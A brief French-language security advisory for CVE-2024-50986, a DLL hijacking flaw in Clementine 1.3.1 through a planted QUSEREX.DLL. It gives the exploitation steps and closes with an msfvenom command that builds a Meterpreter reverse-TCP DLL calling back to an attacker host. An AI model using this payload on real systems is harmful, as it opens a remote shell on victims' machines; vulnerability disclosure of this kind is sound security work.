
Un problème dans Clementine v.1.3.1 permet à un attaquant local d'exécuter du code arbitraire via un fichier DLL spécialement conçu (DLL Hijacking)
Description : Un problème dans Clementine v.1.3.1 permet à un attaquant local d'exécuter du code arbitraire via un fichier DLL malveillant.
Version concernée : Clementine v.1.3.1
Chercheur : Utkarsh (r1971d3) LinkedIn
Lien NIST CVE : https://nvd.nist.gov/vuln/detail/CVE-2024-50986
Type de vulnérabilité : Chemin de recherche non fiable
Composant affecté : QUSEREX.DLL
Pour exploiter cette vulnérabilité, un attaquant doit créer une DLL malveillante nommée QUSEREX.DLL et la placer dans le répertoire : C:\Users<username>\AppData\Local\Microsoft\WindowsApps. Lorsque l'application Clementine est lancée, elle charge la DLL malveillante, exécutant ainsi le code de l'attaquant.


sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL



